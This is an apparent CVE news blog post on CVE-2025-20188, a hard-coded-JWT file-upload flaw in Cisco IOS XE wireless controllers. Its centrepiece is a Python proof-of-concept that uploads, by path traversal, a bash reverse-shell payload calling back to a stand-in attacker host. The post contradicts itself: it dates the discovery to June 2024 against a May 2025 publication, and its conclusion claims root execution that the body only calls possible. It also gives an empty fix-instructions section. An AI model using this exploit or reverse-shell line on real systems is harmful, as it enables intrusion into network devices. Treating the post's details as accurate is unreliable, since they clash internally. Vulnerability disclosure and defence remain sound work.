CVE CyberSecurity Database News

CVE-2025-20188 - How Unauthenticated File Upload in Cisco IOS XE WLCs Puts Your Network at Risk

Poster -

On June 2024, a critical security vulnerability, CVE-2025-20188, was uncovered in the Out-of-Band AP Image Download feature of Cisco IOS XE Software running on Wireless LAN Controllers (WLCs). This is a big deal for network admins everywhere. In this post, we’ll break down what’s going on, show sample code demonstrating how attackers work this flaw, and explain how you can protect your environment.

What is CVE-2025-20188?

At its core, CVE-2025-20188 allows an unauthenticated remote attacker to upload any file they want to Cisco WLCs. This is all because Cisco’s implementation included a hard-coded JSON Web Token (JWT), which, if known, can be used by anyone to bypass authentication and interact with the management interface.

How Does the Attack Work?

The vulnerability is pretty straightforward to exploit, as long as the Out-of-Band Image Download is turned on.

1. Discover the WLC

An attacker scans for WLC devices with the vulnerable service exposed (for example, using nmap or shodan). They might look for the admin web interface.

2. Craft HTTPS Requests with the Hard-Coded JWT

The attacker retrieves or reverse-engineers the JWT hard-coded in the device firmware or binaries. Since it's always the same secret, they don’t need to steal it. They simply use it as described below.

3. Send a Malicious Payload

The attacker sends an HTTPS POST request to the image upload endpoint, using the JWT as a bearer token in their header. They supply a malicious file path (using ../ directory traversal) and include a file containing a script or binary.

Example Exploit: Step-by-Step

Here’s a Python proof-of-concept showing how an attacker would upload a malicious file (for example, a reverse shell script):

import requests

# Target details
TARGET = "https://vulnerable-wlc.example.com";
UPLOAD_PATH = "/ap-image-upload"

# This is the hard-coded JWT found in the device.
JWT_TOKEN = "eyJhbGciOiJIUzI1...hardcoded_token_string"

# The malicious file to upload (a simple bash reverse shell as an example)
payload = "#!/bin/bash\nbash -i >& /dev/tcp/attacker.example.com/4444 >&1\n"

# The file path - using path traversal to write to /tmp/shell.sh
files = {
    'file': ('../../../../tmp/shell.sh', payload)
}

headers = {
    "Authorization": f"Bearer {JWT_TOKEN}"
}

r = requests.post(
    TARGET + UPLOAD_PATH,
    headers=headers,
    files=files,
    verify=False
)

print(f"Status Code: {r.status_code}")
print(f"Response: {r.text}")

*This code abuses path traversal to drop a shell script in /tmp/. The next step would be to trigger execution, which might be possible via a chained vector or by overwriting scripts that run as root.*

Cisco Official Advisory:

Cisco Security Advisory for CVE-2025-20188

National Vulnerability Database:

NVD - CVE-2025-20188

How To Fix

Cisco has released patches—you should install these ASAP. Disabling the Out-of-Band Image Download feature is another quick fix if you don’t use it.

*Instructions:*

Conclusion

CVE-2025-20188 is a serious, easy-to-exploit vulnerability that lets attackers compromise Cisco WLCs over the network — with no login required. All it takes is a single POST request with the hardcoded JWT, and as shown above, they can upload any file, traverse directories, and execute code as root.

Don’t wait.

Monitor logs for any suspicious file uploads.

Stay vigilant, and review advisories at Cisco’s Security Center for the latest.

*If you found this post helpful, share it with your peers so they can secure their networks too!*

Timeline

Published on: 05/07/2025 18:15:38 UTC
Last modified on: 05/08/2025 14:39:09 UTC